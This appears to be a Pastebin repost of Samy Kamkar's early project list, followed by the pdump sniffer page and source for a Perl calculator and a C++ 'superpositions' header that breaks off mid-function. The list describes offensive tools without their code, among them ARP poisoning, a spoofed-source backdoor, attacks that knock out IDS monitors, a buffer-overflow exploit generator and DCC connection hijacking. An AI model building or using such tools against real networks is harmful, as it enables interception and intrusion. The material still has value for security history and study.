Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Old Projects: code from long ago
- sql++
- Full details at http://samy.pl/sql++/
- an easily configurable, feature-rich, portable command-line SQL tool (works with mysql, oracle, pgsql, mssql!, and more)
- posted on december 20, 2000
- pdump
- Full details at http://samy.pl/pdump/
- advanced packet sniffer/injector with the features of all sorts of programs from tcpdump to ngrep to dsniff
- posted on december 20, 2000
- 3.pl
- Full details at http://samy.pl/3.pl
- a calculator with userland namespace, list operations and advanced base conversion (ascii/bin/dec/hex/oct/dotted dec|hex|oct/bcd/packed bcd/etc)
- posted on december 20, 2000
- superpositions.h
- Full details at http://samy.pl/superpositions.h
- C++ header I wrote for 'quantum superpositions'. this allows a layered data type for easy arithmetic comparisons. for example, when you include the header in your programs, you can now compare an array or list of numbers or chars to something else. good examples and description is in the header file, check it out! examples:
- posted on december 20, 2000
- tracertspoof.pl
- Full details at http://samy.pl/tracertspoof.pl
- this is just a proof of concept I wanted to make which spoofs routes when someone traceroutes you. that means if someone traceroutes your host and you're running this program with any ips, the user tracerouting you will see those ips as routes before they see your ip as the last hop
- posted on december 20, 2000
- killmon.pl
- Full details at http://samy.pl/killmon.pl
- this program attempts to kill all sniffers/network monitors/IDSs on your local network or a remote host by using different denial of service attacks on passive network monitors
- posted on december 20, 2000
- arpredir.pl
- Full details at http://samy.pl/arpredir.pl
- program I wrote (still beta) that uses Packet:: to arp poisen a switch, meaning...say you're on a switch and you can't sniff/inject into anyone elses connections, you can use this to actually make all machines on the network think you are that IP, then your box forwards those packets to the real machine via eth packets (you'd have to use ip forwarding for that) enabling you to sniff them up without even setting your eth device in promiscuous mode
- posted on december 20, 2000
- screamingCobra
- Full details at http://samy.pl/scobra/
- an advanced application for automated, remote CGI vulnerability discovery of CGIs with unknown code
- posted on december 20, 2000
- frontdoor.pl
- Full details at http://samy.pl/frontdoor.pl
- old program I worked on as a simple 'replacement' of telnetd, has some nice things such as pty opening so all the good ANSI stuff can pass through the socket and some other fun stuff
- posted on december 20, 2000
- inject.pl
- Full details at http://samy.pl/inject.pl
- program that uses Tk for a GUI, allows you to inject tcp/udp/icmp packets with a nice little interface
- posted on december 20, 2000
- console-inject.pl
- Full details at http://samy.pl/console-inject.pl
- same as above but for console
- posted on december 20, 2000
- ping.pl
- Full details at http://samy.pl/ping.pl
- this program is neat since it allows you to ping a host through multiple protocols such as ICMP, tcp, etc...but it doesn't always use the actual ICMP header all the time, it will use different methods to see if a host is up for systems that block off icmp requests
- posted on december 20, 2000
- raw-ident.pl
- Full details at http://samy.pl/raw-ident.pl
- an identd daemon that controls it's connection raw, not using functions such as socket(), send()/recv(), etc. as an example 'base' for other raw daemons
- posted on december 20, 2000
- pdoor
- Full details at http://samy.pl/pdoor/
- an old 'backdoor' I made that doesn't open any ports and allows you to run programs remotely with a client that spoofs the source of the host and portscans will never find the backdoor since it only looks for certain types of packets and needs no 3way handshakes
- posted on december 20, 2000
- mp3-stream.pl
- Full details at http://samy.pl/mp3-stream.pl
- this is a program that allows you to switch between using your microphone and playing random mp3s on a live mp3 server for anyone to connect to. you can have something like a small radio show, have people listen to music then switch over to microphone and talk about music and then play some more music when everyone starts disconnecting :)
- posted on december 20, 2000
- rc4.pl
- Full details at http://samy.pl/rc4.pl
- RC4 encryption in 146 bytes of code
- posted on december 20, 2000
- passtc.pl
- Full details at http://samy.pl/passtc.pl
- 1st place winner in the toorcon password challenge. the challenge was to create an algorithm/program that generates passwords for users that are easy to remember for them but difficult to crack/brute force for others
- posted on december 20, 2000
- crypt.pl
- Full details at http://samy.pl/crypt.pl
- 2 functions to addon to programs, an encryption function and checking of a plain text password and encrypted password to see if they match
- posted on december 20, 2000
- cp5qrpff-fast.pl
- Full details at http://samy.pl/cp5qrpff-fast.pl
- my version of the original 531-byte qrpff-fast (DeCSS descrambling code). i was able to cut it down to 504-bytes using the same algorithm so no speed cuts of any sort
- posted on december 20, 2000
- cp5qrpff.pl
- Full details at http://samy.pl/cp5qrpff.pl
- my version of the original 526-byte qrpff (DeCSS descrambling code). i was able to cut it down to 500-bytes using the same algorithm so no speed cuts of any sort
- posted on december 20, 2000
- enigma.pl
- Full details at http://samy.pl/enigma.pl
- an enigma 3 rotor simulation program...takes you back, doesn't it?
- posted on december 20, 2000
- vnchown.exe
- Full details at http://samy.pl/vnchown.exe
- stand alone win32 executable for adding https support to a VNC+http server
- posted on december 20, 2000
- clear.txt
- Full details at http://samy.pl/clear.txt
- converting perl code to 'nothing' and executing it from 'nothing'
- posted on december 20, 2000
- DCCp5bot
- Full details at http://samy.pl/dccp5bot.pl
- this is an automated IRC bot from a few years back, it connects to an IRC server, joins a channel and automatically queues up specific files within DCC Fservs. has resume support and automates the downloading of files as quickly as possible from multiple sources
- posted on december 20, 2000
- mp3get.pl
- Full details at http://samy.pl/mp3get.pl
- recursively scans Apache dir structures looking for MP3s and downloads them (doesn't go below specified directory unlike other programs) Win32 binary>
- posted on december 20, 2000
- crawl5b.pl
- Full details at http://samy.pl/crawl5b.pl
- this is a program I made for Caezar's Challenge, 5B at DefCon 9. it recursively scans all pages it can find on a specified host and attempts to find CGI holes remotely and gives you an example CGI exploit for everyone it finds (see screamingCobra)
- posted on december 20, 2000
- c2p.pl
- Full details at http://samy.pl/c2p.pl
- a replacement of perl's h2ph (C header to perl header), this does stuff like convert structs to hashes, create the %SIZEOF hash for the size in bytes of actual structs, and other stuff. to be used with Packet::
- posted on december 20, 2000
- hybbot.pl
- Full details at http://samy.pl/hybbot.pl
- an IRC operator and channel service I specifically wrote for SUIDnet, an IRC network which I run a big chunk of (irc.LucidX.com:6667 or with SSL at irc.LucidX.com:9999). I do actaully spend a lot of time with this occasionally so it has evolved
- posted on december 20, 2000
- greph.pl
- Full details at http://samy.pl/greph.pl
- program that takes a list of C/C++/header files and looks through all of them for a regexp but recursively, which can be neat. say you're looking for a certain function in a program, but it's not in that program, and it's not in any of the headers that program uses, it would have to be in one of the headers of one of the headers, or could even go further or further. greph.pl will look all through these and keep on looking recursively without repeating files
- posted on december 20, 2000
- mass.pl
- Full details at http://samy.pl/mass.pl
- this allows you to run one command on multiple files when that command only allows you to run it on one file. an example is tar, say you want to tar -xvf a few different tarballs, but tar only allows you to do one at a time. with mass.pl you can easily do something like ./mass.pl 'tar -xvf *.tar'
- posted on december 20, 2000
- mkmod.pl
- Full details at http://samy.pl/mkmod.pl
- this lets you take a normal perl program and easily convert it to a module, making the easy work easier :) good to use when you're doing this with a lot of programs and want something automated
- posted on december 20, 2000
- burn.pl
- Full details at http://samy.pl/burn.pl
- program that uses Tk as a GUI to interface with mkisofs and burncd to easily burn cds
- posted on december 20, 2000
- tkscan.pl
- Full details at http://samy.pl/tkscan.pl
- old and simple port scanner I made, first time I used Tk also
- posted on december 20, 2000
- Outsmart
- Full details at http://samy.pl/outsmart.txt
- code for local Microsoft Outlook contact database security evasion (has not been successfully done before) to gain remote access to protected contact data
- posted on december 20, 2000
- cracker patcher
- Full details at http://samy.pl/crack/
- this is actually an old application that I just dug up. it's useful for easily creating small, easily distributable cracks/patches for win32 binaries
- posted on december 20, 2000
- 5balgo1.html
- Full details at http://samy.pl/5balgo1.html
- my algorithm for automatic bug/exploit discovery in CGIs for Caezar's Challenge (see screamingCobra)
- posted on december 20, 2000
- 5balgo2.html
- Full details at http://samy.pl/5balgo2.html
- algorithm for automatic bug/exploit discovery in remote software for Caezar's Challenge
- posted on december 20, 2000
- bofgen
- Full details at http://samy.pl/bofgen/
- a buffer overflow exploit generation program I recently wrote to take in certain data and create an exploit for a buffer overflow of a local program. has some neat features. check it out
- posted on december 20, 2000
- 5bhack
- Full details at http://samy.pl/5bhack/
- code for the algorithm on bug/exploit discovery in remote software for Caezar's Challenge
- posted on december 20, 2000
- testenvs.pl
- Full details at http://samy.pl/testenvs.pl
- this will take a binary program, find all of the environment variables, and fill them up with data to attempt to overflow it. it's good with use of `find / -perm -4000`. it will easily help you find some exploitable (through ENV variables) programs and it will also attempt to exploit the program with a basic arguement buffer overflow
- posted on december 20, 2000
- getenvs.pl
- Full details at http://samy.pl/getenvs.pl
- this is a nice version of v9's getenv program. this retrieves environment variables from a binary program when you don't have the source to it. this can be helpful with finding buffer overflows, especially :)
- posted on december 20, 2000
- infobot advisory
- Full details at http://samy.pl/infobot.html
- an old advisory concerning infobot, an IRC automated chat bot
- posted on december 20, 2000
- pijack
- Full details at http://samy.pl/pijack/
- very old and ugly program I wrote when I started getting into sockets, it takes over IRC DCC connections before they get fully established
- pdump - a raw packet sniffer and injector
- Welcome to http://pdump.org (or a mirror)! You can find information here reguarding pdump, downloads, and more. pdump is a raw packet sniffer and injector, written by Samy Kamkar. It has the features of many other programs such as tcpdump, dsniff, and ngrep. Check the manual page for more information!
- ________________________________________
- News - December 26th, 2000
- Finally released pdump 0.8! Added almost 600 new fingerprints for the -x option, much better password sniffing library along with new password sniffing plugs for the web, fixed a few bugs, added new protocol sniffing, added advancements to other protocols, and added new methods for decoding packets. Hopefully I'll get a mailing list up soon, too.
- ________________________________________
- pdump's Manual
- A manual page (in HTML format) on how to use pdump, what it does, all of it's options, and other information on pdump and packets. Also includes examples and other helpful information.
- Download pdump
- You can get all the downloads from here such as the stable version, development version, and even specific files out of a certain version.
- Changes
- You can see all the changes made with all of the versions of pdump here, including changes in the development version!
- Development Directory
- You can connect to the development directory of pdump to see what's new and even get files from the development version to add on to your version.
- pdump, by Samy Kamkar [CommPort5@LucidX.com]
- http://www.samy.pl/pdump/
- #!/usr/bin/perl
- my $debug = 0;
- my $VERSION = "0.42";
- #
- # '3', by Samy Kamkar [cp5@LucidX.com]
- # ver 0.42 - April 14, 2002 -
- # TODO/changeLog is at http://code.lucidx.com/TODO.3
- #
- # thanks to cseg (Fred Souza) for his help
- # and his own original idea which i borrowed:
- # http://cseg.lucidx.com/projects/
- #
- # examples:
- # > x = 3 ; y = (1 .. 3) ; z = (int(reverse(bd(110011))/10))
- # > (z .. x) ** $_, [ y ]
- # = [[1], [2], [3]], [[1], [4], [9]], [[1], [8], [27]]
- #
- # > x = 3
- # > y = 1..3
- # > x
- # = 3
- # > y
- # = [1], [2], [3]
- # > (1 .. x) ** $_, [ y ]
- # = [[1], [2], [3]], [[1], [4], [9]], [[1], [8], [27]]
- #
- # > ((bd(1010)-5)
- # ]> *3 - reverse(
- # ]]> 51)
- # ]> ^ 1)
- # = 1
- #
- # shell$ 3 bd 10011
- # 19
- # shell$ 3 Dd 127.0.0.1
- # 2130706433
- # shell$ 3 aX abc
- # \x61 \x62 \x63
- #
- # ooo - () ** * / % + - . << >> & | ^
- #
- my $baseconv = shift(@ARGV);
- my @values = @ARGV;
- my %namespace;
- my %conv = (
- "b" => "bin", # binary
- "d" => "dec", # decimal
- "o" => "oct", # octal
- "h" => "hex", # hexadecimal
- "a" => "asc", # ascii
- "B" => "bcd", # BCD
- "P" => "pbc", # packed BCD
- "D" => "dot", # dotted-quad (decimal)
- "O" => "dto", # dotted-octal
- "H" => "dth", # dotted-hexadecimal
- "X" => "bbh", # byte-by-byte hexadecimal
- "Y" => "bbd", # byte-by-byte decimal
- "Z" => "bbo", # byte-by-byte octal
- );
- my $convs = join("", keys(%conv));
- unless ($baseconv || $baseconv =~ /^calc/i) {
- my $alive = 1;
- my ($parens, $data) = (0, "");
- print ": Type `help` for help.\n\n";
- while ($alive) {
- print "]" x $parens;
- print "[" x ($parens * -1);
- print "> ";
- chomp($data .= <STDIN>);
- $parens = ($data =~ tr|(||) - ($data =~ tr|)||);
- if ($data =~ /^\s*(?:help|\?)\s*$/mi) {
- &help();
- $data = "";
- }
- elsif ($data =~ /^\s*(?:die|quit|exit)\s*$/mi) {
- $alive = 0; # die later in case we have unfinished business
- }
- elsif ($parens != 0) {
- next;
- }
- else {
- foreach (split(/;/, $data)) {
- my @data = &operate($_);
- if ($#data > 0) {
- print "= [", join("], [", @data), "]\n";
- }
- elsif ($#data != -1) {
- print "= $data[0]\n";
- }
- }
- $data = "";
- $parens = 0;
- }
- }
- die "\n3 -- by Samy Kamkar [cp5\@LucidX.com]\n";
- }
- $baseconv =~ /^(.)(.)$/;
- my ($first, $second) = ($conv{$1} . "2bin", "bin2" . $conv{$2});
- foreach my $value (@values) {
- print &{$second}(&{$first}($value)) . "\n";
- }
- exit 0;
- sub operate {
- my ($string) = @_;
- my (%intns, $ops, @ops, @return);
- my $origstr = $string;
- $string =~ s/\s*//g;
- $string =~ s/,\[([^\]]+)\]$//;
- $string = "($string)";
- if ($ops = $1) {
- while ($ops =~ /\@?\$?([a-zA-Z_]\w+|[a-zA-Z])\[([^\]]+)\]/) {
- my ($tmp1, $tmp2) = ($1, $2);
- $tmp2 =~ s/([^,]+)\.\.([^,]+)/join(",", $1..$2)/ge;
- $ops =~ s/\@?\$?(?:[a-zA-Z_]\w+|[a-zA-Z])\[[^\]]+\]/join(",", @{$namespace{$tmp1}}[split(\/,\/, $tmp2)])/e;
- }
- $ops =~ s/\@?\$?([a-zA-Z_]\w+|[a-zA-Z])/join(",", @{$namespace{$1}})/eg;
- $ops =~ s/([^,]+)\.\.([^,]+)/join(",", $1..$2)/ge;
- @ops = split(/,/, $ops);
- }
- push(@ops, 0) unless @ops;
- foreach my $op (@ops) {
- my $nstr = my $str = $string;
- $namespace{"_"} = $op;
- my (@ret, @iops);
- while ($str =~ /\@?\$?([a-zA-Z_]\w*|\d+|\d*\.\d+)\.\.\@?\$?([a-zA-Z_]\w*|\d+|\d*\.\d+)/g) {
- my ($tmp1, $tmp2) = ($1, $2);
- $tmp1 = $namespace{$tmp1} if $tmp1 =~ /^[a-zA-Z_]/;
- $tmp2 = $namespace{$tmp2} if $tmp2 =~ /^[a-zA-Z_]/;
- $str =~ s/\@?\$?(?:[a-zA-Z_]\w*|\d+|\d*\.\d+)\.\.\@?\$?(?:[a-zA-Z_]\w*|\d+|\d*\.\d+)/\$__/;
- push(@iops, $tmp1 .. $tmp2);
- $nstr = $str;
- }
- while ($str =~ /\@?\$?([a-zA-Z_]\w*|\d+|\d*\.\d+),\@?\$?([a-zA-Z_]\w*|\d+|\d*\.\d+)/g) {
- my ($tmp1, $tmp2) = ($1, $2);
- $tmp1 = $namespace{$tmp1} if $tmp1 =~ /^[a-zA-Z_]/;
- $tmp2 = $namespace{$tmp2} if $tmp2 =~ /^[a-zA-Z_]/;
- $str =~ s/\@?\$?(?:[a-zA-Z_]\w*|\d+|\d*\.\d+),\@?\$?(?:[a-zA-Z_]\w*|\d+|\d*\.\d+)/\$__/;
- push(@iops, $tmp1, $tmp2);
- $nstr = $str;
- }
- # pretend parse tree starts here
- my (@nvals, $type);
- while ($str) {
- my ($ins, $dins);
- if ($str =~ s/^([a-zA-Z][a-zA-Z0-9]*)\(//) {
- if (length($1) == 2 || $1 eq "factorial") {
- $type = "VFunc";
- }
- else {
- $type = "Func";
- }
- }
- elsif ($str =~ s/^\$?\@?([a-zA-Z]\w*)([^\.=])/$2/) {
- my $tmp = $1;
- if (ref($namespace{$tmp}) eq "ARRAY") {
- push(@iops, @{$namespace{$tmp}});
- $type = "Var";
- $ins = "__";
- }
- else {
- $str = $namespace{$tmp} . $str;
- $dins = 1;
- $type = "Num";
- }
- }
- elsif ($str =~ s/^\$?\@?([_a-zA-Z]\w*)//) {
- $type = "Var";
- }
- elsif ($str =~ s/^((?:0*(?:2(?:[0-4]\d|5[0-5])|1?\d{1,2})\.){3}(?:2(?:[0-4]\d|5[0-5])|1?\d{1,2}))//x) {
- $type = "IP";
- }
- elsif ($str =~ s/^(\d*\.\d+|\d+)//) {
- $type = "Num";
- }
- elsif ($str =~ s/^([^\w()\@\$,\.\:"'=]+)//) {
- $type = "OpChr";
- }
- elsif ($str =~ s/^([(),])//) {
- $type = "Chr";
- }
- elsif ($str =~ s/^(\.=)//) {
- $type = "Append";
- }
- elsif ($str =~ s/^(=)//) {
- $type = "Assign";
- }
- elsif ($str =~ s/^("[^"]*")// || $str =~ s/^('[^']*')//) {
- $type = "Str";
- }
- else {
- return "error: bad input near: " . substr($str, 0, 5);
- }
- unless ($dins) {
- if ($ins) {
- push (@nvals, [$ins, $type]);
- }
- else {
- push (@nvals, [$1, $type]);
- }
- }
- }
- push(@iops, 0) unless @iops;
- # end of pretend parse tree
- foreach my $iop (@iops) {
- my @vals = map [@$_], @nvals;
- $namespace{'__'} = $iop;
- for (my $i = $#vals; $i >= 0; $i--) {
- my ($elem, $type) = @{$vals[$i]};
- print "$elem\t-> $type\n" if $debug;
- if ($type eq "Assign") {
- push(@{$namespace{"_assign"}}, "$vals[$i-1][0]") unless grep { '^$vals[$i-1][0]$' } @{$namespace{"_assign"}};
- @{$vals[$i]} = ("", "Empty");
- @{$vals[$i-1]} = ("", "Empty");
- }
- if ($type eq "Append") {
- push(@{$namespace{"_append"}}, "$vals[$i-1][0]") unless grep { '^$vals[$i-1][0]$' } @{$namespace{"_append"}};
- @{$vals[$i]} = ("", "Empty");
- @{$vals[$i-1]} = ("", "Empty");
- }
- if ($type eq "Var") {
- if (ref($namespace{$vals[$i][0]}) eq "ARRAY") {
- @{$vals[$i]} = push(@ret, @{$namespace{$vals[$i][0]}});
- }
- else {
- @{$vals[$i]} = ($namespace{$vals[$i][0]}, "Num");
- }
- }
- if ($elem eq "(" || $type eq "Func" || $type eq "VFunc") {
- my ($string, $func);
- my $tmp1 = $i;
- my $tmp2 = 0;
- do {
- if ($tmp2++ == 0) {
- $func = $vals[$tmp1][0];
- }
- else {
- $string .= $vals[$tmp1][0] if $vals[$tmp1][0];
- }
- } while ($vals[$tmp1++][0] ne ")");
- $tmp1--;
- @{$vals[$tmp1]} = ("", "Empty");
- chop($string);
- for ($i .. $tmp1) {
- @{$vals[$_]} = ("", "Empty");
- }
- $vals[$i][0] = eval($string);
- if ($type eq "VFunc") {
- if ($func =~ /^([a-z])([a-z])$/i) {
- $vals[$i][0] = &{'bin2' . $conv{$2}}(&{$conv{$1} . '2bin'}("$vals[$i][0]"));
- }
- elsif ($func eq "factorial") {
- my $tmp = 1;
- foreach (1 .. $vals[$i][0]) {
- $tmp *= $_;
- }
- $vals[$i][0] = $tmp;
- }
- }
- elsif ($type eq "Func") {
- $vals[$i][0] = eval("$func(\"$vals[$i][0]\")");
- }
- }
- }
- push(@ret, eval(join("", map { $$_[0] } @vals)));
- }
- push(@return, ("[" . join("], [", @ret) . "]"));
- }
- my $commas = 0;
- foreach (@return) {
- $commas += tr/,//;
- }
- unless ($commas) {
- foreach (@return) {
- s/^.//;
- s/.$//;
- }
- }
- if ($#{$namespace{"_assign"}} >= 0) {
- foreach my $asn (@{$namespace{"_assign"}}) {
- @{$namespace{$asn}} = ();
- my @tmp = @return;
- @return = ();
- foreach (@tmp) {
- s/^\[//;
- s/\]$//;
- if (@tmp > 1) {
- push(@{$namespace{$asn}}, split(/\], \[/));
- }
- elsif (/,/) {
- push(@{$namespace{$asn}}, split(/\], \[/));
- }
- else {
- $namespace{$asn} = $_;
- }
- }
- }
- @{$namespace{"_assign"}} = ();
- return ();
- }
- if ($#{$namespace{"_append"}} >= 0) {
- foreach my $asn (@{$namespace{"_append"}}) {
- my @tmp = @return;
- @return = ();
- foreach (@tmp) {
- s/^\[//;
- s/\]$//;
- push(@{$namespace{$asn}}, split(/\], \[/));
- }
- }
- @{$namespace{"_append"}} = ();
- return ();
- }
- else {
- return @return;
- }
- }
- sub bin2bin {
- my $val = shift;
- $val =~ s/^0*//;
- return $val;
- }
- sub bcd2bin {
- my $val = shift;
- $val =~ s/0000([01]{4})/&dec2bin(&bin2dec($1))/eg;
- $val =~ s/^0*//;
- return $val;
- }
- sub pbc2bin {
- my $val = shift;
- $val =~ s/([01]{4})/&bin2dec($1)/eg;
- $val = &dec2bin($val);
- $val =~ s/^0*//;
- return $val;
- }
- sub dec2bin {
- my $val = unpack("B*", pack("N", shift));
- $val =~ s/^0*//;
- return $val;
- }
- sub asc2bin {
- my $val = unpack("B*", shift);
- # $val =~ s/^0*//;
- return $val;
- }
- sub hex2bin {
- my $val = shift;
- my @vals;
- push(@vals, hex($1)) while $val =~ s/(?:0x|\\x)?([A-F0-9]{1,2})//i;
- $val = join("", unpack("B*", pack("C*", @vals)));
- $val =~ s/^0*//;
- return $val;
- }
- sub bbh2bin {
- my $val = &hex2bin(shift);
- $val =~ s/^0*//;
- return $val;
- }
- sub bbo2bin {
- my $val = &oct2bin(shift);
- $val =~ s/^0*//;
- return $val;
- }
- sub bbd2bin {
- my $val = &dec2bin(shift);
- $val =~ s/^0*//;
- return $val;
- }
- sub oct2bin {
- my $val = shift;
- $val =~ s/^0// if length($val) > 1;
- $val = unpack("B*", pack("C*", oct($val)));
- $val =~ s/^0*//;
- return $val;
- }
- sub dot2bin {
- my $val = unpack("B36", pack("C4", split(/\./, shift)));
- $val =~ s/^0*//;
- return $val;
- }
- sub dto2bin {
- my $val = shift;
- $val =~ s/^0?(\d+)\.0?(\d+)\.0?(\d+)\.0?(\d+)$/&dot2bin("0$1.0$2.0$3.0$4")/e;
- $val =~ s/^0*//;
- return $val;
- }
- sub dth2bin {
- my $val = shift;
- $val =~ s/^(?:\\x|0x)?(\d+)\.(?:\\x|0x)?(\d+)\.(?:\\x|0x)?(\d+)\.(?:\\x|0x)?(\d+)$/&dot2bin("0x$1.0x$2.0x$3.0x$4")/e;
- $val =~ s/^0*//;
- return $val;
- }
- sub bin2dec {
- my $val = shift;
- my ($result, $place) = (0, 0);
- while ($val =~ s/(.)$//) {
- $result += 2 ** $place++ * $1;
- }
- return $result;
- }
- sub bin2oct {
- return sprintf("0%o", &bin2dec(shift));
- }
- sub bin2hex {
- return sprintf("0x%x", &bin2dec(shift));
- }
- sub bin2bbh {
- return sprintf("\\x%x" x (length(&eight($_[0]))/8), unpack("C*", pack("B*", &eight(shift))));
- }
- sub bin2bbo {
- return sprintf("0%o " x (length(&eight($_[0]))/8), unpack("C*", pack("B*", &eight(shift))));
- }
- sub bin2bbd {
- return join(" ", unpack("C*", pack("B*", &eight(shift))));
- }
- sub bin2asc {
- return pack("B*", &eight(shift));
- }
- sub bin2dot {
- return join(".", unpack("C4", pack("B*", &eight(shift))));
- }
- sub bin2dto {
- return sprintf("0%o.0%o.0%o.0%o", unpack("C4", pack("B*", &eight(shift))));
- }
- sub bin2bcd {
- my $val = &bin2dec(shift);
- $val =~ s/(.)/"0000" . sprintf("%04i", &dec2bin($1))/eg;
- return $val;
- }
- sub bin2pbc {
- my $val = &bin2dec(shift);
- $val =~ s/(.)/sprintf("%04i", &dec2bin($1))/eg;
- return $val;
- }
- sub bin2dth {
- return sprintf("0x%x.0x%x.0x%x.0x%x", unpack("C4", pack("B*", &eight(shift))));
- }
- sub eight {
- my $val = shift;
- $val = "0" . $val while (length($val) % 8);
- return $val;
- }
- sub help {
- print
- "
- 3 -- by Samy Kamkar [cp5\@LucidX.com]
- see $0's code for examples
- BASES:
- b => binary, a => ASCII,
- d => decimal, D => dotted quad,
- o => octal, O => dotted octal,
- h => hexadecimal, H => dotted hexadecimal,
- B => BCD, P => packed BCD,
- X => byte-by-byte hexadecimal,
- Y => byte-by-byte decimal,
- Z => byte-by-byte octal,
- CORE FUNCTIONS: exit, help
- FUNCTIONS: base1base2(value), e.g.: dh(5), Dd(\"127.0.0.1\"), ah(\"abc\")
- also: sin(), reverse(), abs(), atan2(), cos(), exp(), int(),
- sqrt(), log(), factorial()
- OPERATORS: + - * / % ** ^ | & << >> ( )
- using a '(' at the beginning and leaving it open
- after hitting 'Enter' will allow you to neatly
- continue the equation on a new line(s) and you
- would end the equation and get the result after
- closing it with a )
- ";
- #OTHER HELP TOPICS: namespace, commandline
- #
- #for more help on something, enter: help 'base/func/topic'
- #e.g., help b (for help on binary),
- # help log (for help on log()),
- # help delete (for help on delete()),
- # help namespace (for help on the namespace topic),
- # help operators (for all operators), etc.
- }
- /*
- * superpositions.h - nov. 3rd, 2001
- * -samy
- *
- * This allows you to use the implemented any()
- * and all() functions with doubles, ints or chars
- * to allow you to compare the superposition
- * (simultaneous/layered data, for example, an array)
- * with other superpositions or data using arithmetic
- * comparison operators.
- *
- * OPERATORS:
- * ==, !=, >=, <=, >, <
- * FUNCTIONS
- * any(char_array);
- * any(int num_of_elems, double_array);
- * any(int num_of_elems, int_array);
- * any(int num_of_elems, ...);
- * // ... accepts chars, doubles and ints
- * // all() functions are the same as the any()s
- *
- *
- * examples:
- * if (any(num_of_elems, 4, 5, 6) == 5) // num_of_elems should be 3
- * // this is true because 5 is one of the elements
- *
- *
- * if (all(char_array) != all(3, 'a', 'b', 'c'))
- * // this is true if there are no 'a's,
- * // 'b's, or 'c's in char_array
- *
- *
- * int num_of_elems = 2; // passing 2 elements
- * double y[3] = {6.0, 7.0, 8.0};
- * if (any(num_of_elems, 5, 6) == any(3, y))
- * // true since the 6's are passed in both functions
- *
- * etc...
- */
- #ifndef QUANTUM_H_
- #define QUANTUM_H_
- #include <stdarg.h>
- #include <vector>
- #include <iostream.h>
- using namespace std;
- class Quantum
- {
- public:
- Quantum();
- vector<double> data;
- bool type; // true == any, false == all
- bool operator==(double);
- bool operator!=(double);
- bool operator< (double);
- bool operator> (double);
- bool operator<=(double);
- bool operator>=(double);
- bool operator==(Quantum);
- bool operator!=(Quantum);
- bool operator< (Quantum);
- bool operator> (Quantum);
- bool operator<=(Quantum);
- bool operator>=(Quantum);
- };
- Quantum::Quantum()
- {
- type = true;
- }
- Quantum any(char array[]);
- Quantum any(int numArgs, double array[]);
- Quantum any(int numArgs, int array[]);
- Quantum any(int numArgs, double first, ...);
- Quantum any(int numArgs, int first, ...);
- Quantum any(int numArgs, char first, ...);
- Quantum all(char array[]);
- Quantum all(int numArgs, double array[]);
- Quantum all(int numArgs, int array[]);
- Quantum all(int numArgs, double first, ...);
- Quantum all(int numArgs, int first, ...);
- Quantum all(int numArgs, char first, ...);
- // BEGINNING OF SUPERPOSITIONING FUNCTIONS
- // any() functions
- Quantum any(int numArgs, double array[])
- {
- Quantum temp;
- temp.type = true;
- for (int i = 0; i < numArgs; i++)
- temp.data.push_back(array[i]);
- return temp;
- }
- Quantum any(int numArgs, int array[])
- {
- Quantum temp;
- temp.type = true;
- for (int i = 0; i < numArgs; i++)
- temp.data.push_back(double(array[i]));
- return temp;
- }
- Quantum any(char array[])
- {
- Quantum temp;
- temp.type = true;
- int i = 0;
- for (i = 0; array[i] != '\0'; i++)
- temp.data.push_back(double(array[i]));
- array[i] = 0;
- return temp;
- }
- Quantum any(int numArgs, double first, ...)
- {
- va_list ap;
- va_start(ap, first);
- Quantum temp;
- temp.type = true;
- temp.data.push_back(first);
- for (int i = 1; i < numArgs; i++)
- temp.data.push_back(va_arg(ap, double));
- va_end(ap);
- return temp;
- }
- Quantum any(int numArgs, int first, ...)
- {
- va_list ap;
- va_start(ap, first);
- Quantum temp;
- temp.type = true;
- temp.data.push_back(first);
- for (int i = 1; i < numArgs; i++)
- temp.data.push_back(va_arg(ap, int));
- va_end(ap);
- return temp;
- }
- Quantum any(int numArgs, char first, ...)
- {
- va_list ap;
- va_start(ap, first);
- Quantum temp;
- temp.type = true;
- temp.data.push_back(first);
- for (int i = 1; i < numArgs; i++)
- temp.data.push_back(va_arg(ap, char));
- va_end(ap);
- return temp;
- }
- // all() functions
- Quantum all(int numArgs, double array[])
- {
- Quantum temp;
- temp.type = false;
- for (int i = 0; i < numArgs; i++)
- temp.data.push_back(array[i]);
- return temp;
- }
- Quantum all(int numArgs, int array[])
- {
- Quantum temp;
- temp.type = false;
- for (int i = 0; i < numArgs; i++)
- temp.data.push_back(double(array[i]));
- return temp;
- }
- Quantum all(char array[])
- {
- Quantum temp;
- temp.type = false;
- int i = 0;
- for (i = 0; array[i] != '\0'; i++)
- temp.data.push_back(double(array[i]));
- array[i] = 0;
- return temp;
- }
- Quantum all(int numArgs, double first, ...)
- {
- va_list ap;
- va_start(ap, first);
- Quantum temp;
- temp.type = false;
- temp.data.push_back(first);
- for (int i = 1; i < numArgs; i++)
- temp.data.push_back(va_arg(ap, double));
- va_end(ap);
- return temp;
- }
- Quantum all(int numArgs, int first, ...)
- {
- va_list ap;
- va_start(ap, first);
- Quantum temp;
- temp.type = false;
- temp.data.push_back(first);
- for (int i = 1; i < numArgs; i++)
- temp.data.push_back(va_arg(ap, int));
- va_end(ap);
- return temp;
- }
- Quantum all(int numArgs, char first, ...)
- {
- va_list ap;
- va_start(ap, first);
- Quantum temp;
- temp.type = false;
- temp.data.push_back(first);
- for (int i = 1; i < numArgs; i++)
- temp.data.push_back(va_arg(ap, char));
- va_end(ap);
- return temp;
- }
- // END OF SUPERPOSITIONING FUNCTIONS
- // BEGINNING OF OVERLOADED OPERATORS (Quantum ? Double)
- bool Quantum::operator==(double x)
- {
- register int i = 0;
- // any()
- if (type == true)
- {
- for (; i < data.size(); i++)
- if (data[i] == x)
- return true;
- return false;
- }
- // all()
- else
- {
- for (; i < data.size(); i++)
- if (data[i] != x)
- return false;
- return true;
- }
- return false;
- }
- bool Quantum::operator!=(double x)
- {
- register int i = 0;
- // any()
- if (type == true)
- {
- for (; i < data.size(); i++)
- if (data[i] != x)
- return true;
- return false;
- }
- // all()
- else
- {
- for (; i < data.size(); i++)
- if (data[i] == x)
- return false;
- return true;
- }
- return false;
- }
- bool Quantum::operator>=(double x)
- {
- register int i = 0;
- // any()
- if (type == true)
- {
- for (; i < data.size(); i++)
- if (data[i] >= x)
- return true;
- return false;
- }
- // all()
- else
- {
- for (; i < data.size(); i++)
- if (data[i] < x)
- return false;
- return true;
- }
- return false;
- }
- bool Quantum::operator<=(double x)
- {
- register int i = 0;
- // any()
- if (type == true)
- {
- for (; i < data.size(); i++)
- if (data[i] <= x)
- return true;
- return false;
- }
- // all()
- else
- {
- for (; i < data.size(); i++)
